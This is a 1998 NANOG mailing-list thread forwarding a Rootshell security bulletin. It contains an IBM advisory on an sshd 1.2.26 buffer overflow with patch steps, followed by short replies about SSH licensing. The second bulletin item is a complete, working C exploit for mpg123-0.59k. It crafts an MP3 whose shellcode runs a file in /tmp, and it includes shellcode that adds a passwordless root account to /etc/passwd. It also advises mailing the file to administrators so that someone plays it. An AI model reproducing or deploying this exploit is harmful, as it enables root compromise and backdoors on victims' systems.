[rootshell] Security Bulletin #25
As this conversation has carried over to NANOG this should be of interest. -- Kit Knox <kit@connectnet.com> Senior System Administrator - CONNECTnet INS, Inc. www.rootshell.com Security Bulletin #25 November 1st, 1998 [ http://www.rootshell.com/ ] ---------------------------------------------------------------------- To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com with "unsubscribe announce" in the BODY of the message. Send submissions to info@rootshell.com. Messages sent will not be sent to other members on this list unless it is featured in a security bulletin. An archive of this list is available at : http://www.rootshell.com/mailinglist-archive ---------------------------------------------------------------------- Contents -------- 01. ssh 1.2.26 vulnerability 02. mpg123-0.59k buffer overflow with exploit 01. ssh 1.2.26 vulnerability ---------------------------- As most of you are aware, the Rootshell site was compromised on October 28th. In order to keep the integrity of our investigation we have been fairly closed-lipped about this incident until now. This has led to widespread rumors and speculation by netizens who have zero first hand knowledge about the break-in. Some people now believe that we had no evidence of an ssh break-in. SSH Communications Security Ltd. even went as far as saying they have analyzed the Rootshell logs, etc. Unless they have broken into our network this is not possible. We at Rootshell believe they are now simply in damage control mode and nothing else. Since the very beginning, Rootshell has been working very closely with the folks at CERT, and the members of law enforcement to track down the individuals responsible for the Rootshell break-in. As the ssh issue has been a very sensitive topic we have avoided making any statements until we were sure about anything one way or the other. The *ONLY* thing Rootshell has ever said in public about SSH until now has been "The paranoid MAY want to disable ssh 1.2.26." In order to show the type of evidence Rootshell has received at this point, below you will find a draft that IBM was intending to release on Monday about SSH. They appear to have jumped the gun slightly and do not have working exploit code, but have found possible buffer overflows in the ssh 1.2.26 code. Rootshell has also received further reports of exploit code going around in various circles. SSH Communications Security Ltd. has evaluated this bulletin and now believes it is actually not a problem. Rootshell will continue its investigation of this matter as well as other security issues and will make this information public as soon as possible. I hope that this bulletin will at the very least put an end to the wild speculation that this was a hoax, or that we are just in the business of making wild accusations. Please see http://www.ssh.fi/sshprotocols2/rootshell.html for their "analysis" of events. It is sad that we had to learn of this URL from Slashdot.org instead of SSH directly. They appear to have some serious communications dificuilties. Both Rootshell and CERT were met with unanswered phones at SSH Communications Security Ltd. and Data Fellows when we attempted to research this matter. Perhaps after this incident they can work on correcting these issues. SSH is a trademark of SSH Communications Security Ltd. All rights reserved. [ end rant ] --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT-- ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE--- ======= ============ ====== ====== ======= ============== ======= ======= === === ==== ====== ====== === =========== ======= ======= === =========== === ======= === === === ==== === ===== === ======= ============== ===== === ===== ======= ============ ===== = ===== EMERGENCY RESPONSE SERVICE SECURITY VULNERABILITY ALERT 30 October 1998 18:00 GMT Number: ERS-SVA-E01-1998:005.1 =============================================================================== VULNERABILITY SUMMARY VULNERABILITY: Buffer overflow condition in "sshd" logging facility PLATFORMS: Versions of SSH up to and including SSH 1.2.26. SSH 2.0.x is *not* believed to be vulnerable. SOLUTION: Follow the procedures described in Section IV, below THREAT: Local and remote users can obtain privileged access to the system. =============================================================================== DETAILED INFORMATION I. Description SSH (Secure Shell) is software that allows users to log into other computers over a network, execute commands on remote systems, and move files from one host to another. It provides strong authentication and secure (encrypted) communications over insecure channels. SSH is produced by SSH Communications Security, Ltd., Finland (www.ssh.fi). SSH is distributed for non-commercial use from ftp://ftp.cs.hut.fi/pub/ssh; commercial licensing is handled by Data Fellows, Ltd. (www.datafellows.com). The IBM Global Security Analysis Laboratory has identified a buffer overflow vulnerability in the SSH server program, "sshd." The "log_msg" function, called by several parts of the server program to send information to the system log, copies user-supplied data into a local buffer without checking that the data will fit. Several other similar logging, debug, and error functions perform this operation as well. When a large amount of data is supplied, a buffer overrun condition will occur. II. Impact If a user is able to exploit this vulnerability to create a buffer overrun, it may be possible for the user to supply machine-language program instructions that will then be executed with the privileges of the user running the "sshd" program, usually the super-user. This vulnerability can be exploited by local and remote users. The person exploiting the vulnerability does not need to have an account on the machine running "sshd" to succeed. III. Platform-Specific Threats This vulnerability affects recent (and perhaps older) 1.2.x versions of the "sshd" server. The current 1.2.x version of the server is 1.2.26. It is believed that the 2.0.x versions of the "sshd" server do not contain this vulnerability. The current 2.0.x version of the server is 2.0.9. IV. Solutions IBM-ERS has provided the information it has developed about this vulnerability to SSH Communications Security, Ltd, and anticipates that a new versions of SSH 1.2.x that fixes this vulnerability will be available soon. When this new version becomes available, IBM-ERS urges all sites to upgrade their SSH servers to the new release as quickly as possible. In the meantime, however, IBM-ERS and the IBM GSAL have developed the three following specific actions that you can take to address this vulnerability. Option 1: Operate the "sshd" program with the "-q" option turned on. Note that this will disable the logging functions normally performed. This may be undesirable in some situations. Option 2: If possible, upgrade to version 2.0.x of SSH. This version supports a newer, more capable version of the SSH protocol and offers additional features. Option 3: Follow the procedure below to patch the SSH 1.2.26 source code to address this vulnerability in a manner similar to the way the SSH 2.0.x source code addresses it. NOTE: This procedure should only be attempted by persons familiar with installing the SSH software from source code. 1. Obtain the source code distributions for SSH 1.2.26 and SSH 2.0.9 from ftp://ftp.cs.hut.fi/pub/ssh or Data Fellows, Ltd. Be sure to observe all licensing requirements. 2. Copy the following files lib/sshutil/snprintf.h lib/sshutil/snprintf.c from the SSH 2.0.9 directory to the SSH 1.2.26 directory (put them at the top level, do not reproduce the subdirectories). 3. Edit "Makefile.in" in the SSH 1.2.26 directory and add the word "snprintf.o" to the "COMMON_OBJS" and "SCP_OBJS" definitions. Also add the word "snprintf.h" to the "HEADERS" definition. 4. Edit the files "log-server.c," "packet.c," and "scp.c" in the SSH 1.2.26 directory and do the following: a. Add the line #include "snprintf.h" near the top of each file with the rest of the "#include" lines. b. Locate all occurrences of vsprintf(buf, fmt, args); in each file and replace them with vsnprintf(buf, sizeof(buf), fmt, args); There are six (6) occurrences in "log-server.c," two (2) in "packet.c," and one (1) in "scp.c". 5. Edit "snprintf.h" and change the line #include "sshincludes.h" to read #include "includes.h" Also delete the two occurrences of the word "DLLEXPORT." 6. Edit "snprintf.c" and change the line #include "sshincludes.h" to read #include "includes.h" Also replace the one occurrence of "ssh_xmalloc" with "xmalloc", and the two occurrences of "ssh_xfree" with "xfree". 7. Read the instructions in the "INSTALL" file in the SSH 1.2.26 directory to build and install the modifications made above. IBM-ERS and IBM GSAL have carefully examined the SSH 1.2.26 source code, and tested these steps on a production "sshd" server. No ill effects have been observed. However, because it is impossible to anticipate all possible environments in which SSH is used, the following disclaimer applies to the procedures above: THESE PROCEDURES ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, INCLUDING, WITHOUT LIMITATION, ANY IMPLIED WARRANTIES OF MERCHANTIBILITY OR FITNESS FOR A PARTICULAR PURPOSE. THIS ADVISORY DOES NOT CREATE OR IMPLY ANY SUPPORT OBLIGATIONS OR ANY OTHER LIABILITY ON THE PART OF IBM OR ITS SUBSIDIARIES. V. Acknowledgements IBM-ERS would like to thank Alan and Art at the IBM Global Security Analysis Laboratory for their work in identifying this problem. SSH and Secure Shell are trademarks or registered trademarks of SSH Communications Security Ltd. =============================================================================== IBM's Internet Emergency Response Service (IBM-ERS) is a subscription-based Internet security response service that includes computer security incident response and management, regular electronic verification of your Internet gateway(s), and security vulnerability alerts similar to this one that are tailored to your specific computing environment. By acting as an extension of your own internal security staff, IBM-ERS's team of Internet security experts helps you quickly detect and respond to attacks and exposures across your Internet connection(s). As a part of IBM's Business Recovery Services organization, the IBM Internet Emergency Response Service is a component of IBM's SecureWay(tm) line of security products and services. From hardware to software to consulting, SecureWay solutions can give you the assurance and expertise you need to protect your valuable business resources. To find out more about the IBM Internet Emergency Response Service, send an electronic mail message to ers-sales@vnet.ibm.com, or call 1-800-742-2493 (Prompt 4). IBM-ERS maintains a site on the World Wide Web at http://www.ers.ibm.com/. Visit the site for information about the service, copies of security alerts, team contact information, and other items. IBM-ERS uses Pretty Good Privacy* (PGP*) as the digital signature mechanism for security vulnerability alerts and other distributed information. The IBM-ERS PGP* public key is available from http://www.ers.ibm.com/team-info/pgpkey.html. "Pretty Good Privacy" and "PGP" are trademarks of Philip Zimmermann. IBM-ERS is a Member Team of the Forum of Incident Response and Security Teams (FIRST), a global organization established to foster cooperation and response coordination among computer security teams worldwide. Copyright 1998 International Business Machines Corporation. The information in this document is provided as a service to customers of the IBM Emergency Response Service. Neither International Business Machines Corporation, nor any of its employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, complete- ness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by IBM or its subsidiaries. The views and opinions of authors expressed herein do not necessarily state or reflect those of IBM or its subsidiaries, and may not be used for advertising or product endorsement purposes. The material in this security alert may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to IBM-ERS. This security alert may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community. ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE--- --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT-- 02. mpg123-0.59k buffer overflow with exploit ---------------------------------------------
From na98jen@student.hig.se Sun Nov 1 12:31:44 1998 Date: Sun, 1 Nov 1998 12:56:37 +0100 (MET) From: Joel Eriksson <na98jen@student.hig.se> To: submission@rootshell.com Subject: mpg123-0.59k bufferoverflow.
More info in my Bugtraq-posting... Here I'll just include the stuff for the sCr1p+-k1dD13z. This will create a 56 bytes MP3 that executes /tmp/.x which could for example be a program that checks the UID and if run by root creates a new account / SUID-shell / installs backdoors / whatever, and if run by a user adds entries to their .rhosts or something.. I have included a 93 bytes buffer with machinecode to create a new root-account on the system which I planned to read in and jmp to with the 48 bytes we can use in the overflow. Have not had the time to fix some problems with this method though, so you'll have to satisfy with this if you don't want to code it yourself. For those who haven't figured that out yet you'll have to get someone to try to listen to the damn thing too. :-) (I say this in the comments to the src to, but noone seems to read those damn comments anyway so..) You could for example mail the file to other users / the sysadmin, or just have it in /tmp or your homedir and wait 'til someone gets curious.. --- mp3exp.c START [cut here] /* ** Exploit for mpg123-0.59k, Linux x86. ** --- calcaddr.sh START #!/bin/sh perl -e 'print "RIFF" . "A"x56'>bof.mp3 mpg123 bof.mp3 2> /dev/null echo info all-registers \ |gdb mpg123 core 2>/dev/null|egrep "^esp"|awk '{print $2}' rm -f bof.mp3 --- calcaddr.sh END ** ** Give the address shown by calcaddr.sh as the first argument to ** this exploit, and it will handle the rest.. (e.g. subtract 0x4C ** from the address given) OBS! If you do what the script does manually ** you will not get the same result. Then CALCOFFSET should be 0x34 instead. ** ** mpg123-0.59o is not vulnerable, previous versions not checked. ** ** DESCRIPTION: ** ** Makes an MP3-file that executes a program when played with mpg123-0.59k. ** Will be more useful when I have succeded in making it add an account, ** the problem is that we only have 48 bytes to work with and my code ** to add a new account takes 93 bytes. ** ** For those who have not understood that yet, the trick is too get ** *someone*else* to play the MP3 using mpg123. You could for example ** mail the file to the sysadmin or just have it in /tmp and name it ** something like k3w1-mUz4c.MP3 or whatever may seem appropriate. :-) ** ** Plan: In the 48 bytes I can put my code I'll make a routine that ** just allocates a buffer, reads in the 93 bytes required to add ** an account and jmp's to the beginning of the code. ** ** (C) 1998/10/31, Joel Eriksson - Chaoz on IRCNet. ** ** Disclaimer: This program is for informational purposes only. ** I can not be held responsible for any use or misuse ** of this program. And so on, the usual stuff.. */ #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> #include <limits.h> #define ADDRLEN 4 #define DEFAULT_OFFSET -0x88; #define CALCOFFSET -0x4C /* ** When the address is calculated in a subshell (e.g. using the script ** included with this sourcecode) the offset is -0x4C, but when it is ** calculated manually in the lowest shell-level the offset is -0x34. */ #define MP3NAME "bof.mp3" const char FILLCHAR = '.'; /* ** Standard shellcode, made by Aleph One, published in Phrack #49 ** Modified to execute /tmp/.x instead of /bin/sh. ** ** /tmp/.x could for example add an account, create a SUID-root shell ** or if run by an ordinary user add an entry to their .rhosts, create ** a SUID-user shell or something else that seems like a good idea. */ char shellcode[] = "\xeb\x1f" // jmp 0x1f "\x5e" // popl %esi "\x89\x76\x08" // movl %esi,0x8(%esi) "\x31\xc0" // xorl %eax,%eax "\x88\x46\x07" // movb %al,0x7(%esi) "\x89\x46\x0c" // movl %eax,0xc(%esi) "\xb0\x0b" // movb $0xb,%al "\x89\xf3" // movl %esi,%ebx "\x8d\x4e\x08" // leal 0x8(%esi),%ecx "\x8d\x56\x0c" // leal 0xc(%esi),%edx "\xcd\x80" // int $0x80 "\x31\xdb" // xorl %ebx,%ebx "\x89\xd8" // movl %ebx,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 "\xe8\xdc\xff\xff\xff" // call -0x24 "/tmp/.x"; // .string "/bin/sh" // 46 bytes /* ** To execute something else than /tmp/.x just change the last string, ** but remember that it must be a 7 bytes string. It's possible to ** change the shellcode to execute a command with a longer path than ** 7 bytes by changing the offsets from %esi, which is not too hard ** if you know some assembler. */ /* ** Code to add user to passwd-file, made by me. Not used in this ** particular exploit yet, but ideally it'd be read in and executed ** by the 48 bytes that I have used to execute a shell in this exploit. ** This way the exploit becomes more interesting since it can be exploited ** remotely. We need to do some stackprediction though.. ** ** If someone makes an exploit that uses this code, make sure to include ** me in the greetings. */ char addusercode[] = "\xeb\x3d" // jmp 0x3d "\x5e" // popl %esi "\x89\x76\x1a" // movl %esi,0x1a(%esi) "\x31\xc0" // xorl %eax,%eax "\x88\x46\x0b" // movb %al,0x0b(%esi) "\x83\xc6\x0c" // addl $0x0c,%esi "\x89\x76\x12" // movl %esi,0x12(%esi) "\x83\xee\x0c" // subl $0x0c,%esi "\x31\xc0" // xorl %eax,%eax "\x88\x46\x19" // movb %al,0x19(%esi) "\x8b\x5e\x1a" // movl 0x1a(%esi),%ebx "\x31\xc9" // xorl %ecx,%ecx "\xb5\x04" // movb $0x4,%ch "\xb1\x01" // movb $0x1,%cl "\x31\xc0" // xorl %eax,%eax "\xb0\x05" // movb $0x5,%al "\xcd\x80" // int $0x80 "\x89\xc3" // movl %eax,%ebx "\x8b\x4e\x1e" // movl 0x1e(%esi),%ecx "\x31\xd2" // xorl %edx,%edx "\xb2\x0d" // movb $13,%edx "\x31\xc0" // xorl %eax,%eax "\xb0\x04" // movb $0x4,%al "\xcd\x80" // int $0x80 "\x31\xdb" // xorl %ebx,%ebx "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // movb $0x1,%al "\xcd\x80" // int $0x80 "\xe8\xbe\xff\xff\xff" // call -0x46 "/etc/passwd." // .string "/etc/passwd" "r00t::0:0:::\x0a"; // .string "r00t::0:0:::\n" // 93 bytes unsigned long getsp() { __asm("mov %esp, %eax"); } int main(int argc, char **argv) { unsigned long addr; char *addr_ptr = (char*)&addr; int fd, i; char *filename = MP3NAME; addr = getsp() + DEFAULT_OFFSET; if(argc > 1) { /* ** This is UGLY coding. :-) strtol() overflows for some reason ** when just doing one strtol() on argv[1]. */ char *strptr = argv[1]; char *numptr; char cur[3]; char temp; int i; memset(addr_ptr, 0, ADDRLEN); memset(cur, 0, 3); if(!strncmp(strptr, "0x", 2)) strptr += 2; for(i=0; i<ADDRLEN; i++, strptr+=2) { strncpy(cur, strptr, 2); numptr = (char*)&addr_ptr[(ADDRLEN-1)-i]; *numptr = strtol(cur, (char**)NULL, 16) & 0xFF; } addr += CALCOFFSET; } else { fprintf(stderr, "Warning: Returnaddress may not be accurate.\n"); fprintf(stderr, "Use calcaddr.sh (included) to be more precise.\n\n"); } if(argc > 2) filename = argv[2]; if(argc > 3) { fprintf(stderr, "Usage: %s [<address>] [<filename>]\n", argv[0]); exit(1); } if((fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0644)) == -1) { perror("open"); fprintf(stderr, "Could not create %s\n", filename); exit(1); } printf("Using address: 0x%lx\n", addr); write(fd, "RIFF", 4); write(fd, shellcode, strlen(shellcode)); for(i=0; i<48-strlen(shellcode); i++) write(fd, &FILLCHAR, 1); for(i=0; i<4; i++) write(fd, &addr_ptr[i], 1); printf("\nMP3 created in %s.\n", filename); exit(0); } -- mp3exp.c END [cut here] ---------------------------------------------------------------------- To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com with "unsubscribe announce" in the BODY of the message. Send submissions to info@rootshell.com. Messages sent will not be sent to other members on this list unless it is featured in a security bulletin. An archive of this list is available at : http://www.rootshell.com/mailinglist-archive ----------------------------------------------------------------------
In message <Pine.LNX.4.05.9811011244040.23543-100000@kit.rootshell.com>, Kit Knox writes:
Option 2: If possible, upgrade to version 2.0.x of SSH. This version supports a newer, more capable version of the SSH protocol and offers additional features.
Interesting. SSH 2.0 has a more restrictive software license than 1.2.26. The paranoid among us would wonder whether this was a deliberate attempt to convince people to upgrade to 2.0, incidentally forcing many of them to pay for the new license. Nah; nobody would exploit FUD to make a buck, would they? <grin> -- C. Harald Koch <chk@utcc.utoronto.ca> "It takes a child to raze a village." -Michael Fry
Well, seeing how 2.0 is actually a commercial product and supposedly re-written, I can see why they'd want to sell it. If you want to run ssh and don't want to pay for it, you're stuck with the 1.x version. Those that can pay do, and those that don't whine for some reason. It's not like you couldn't take the source to 1.2.26 and alter it now, is it? Regards, Joseph Shaw - jshaw@insync.net NetAdmin/Security - Insync Internet Services Free UNIX advocate - "I hack, therefore I am." On Sun, 1 Nov 1998, C. Harald Koch wrote:
Interesting.
SSH 2.0 has a more restrictive software license than 1.2.26. The paranoid among us would wonder whether this was a deliberate attempt to convince people to upgrade to 2.0, incidentally forcing many of them to pay for the new license.
participants (3)
-
C. Harald Koch
-
Joe Shaw
-
Kit Knox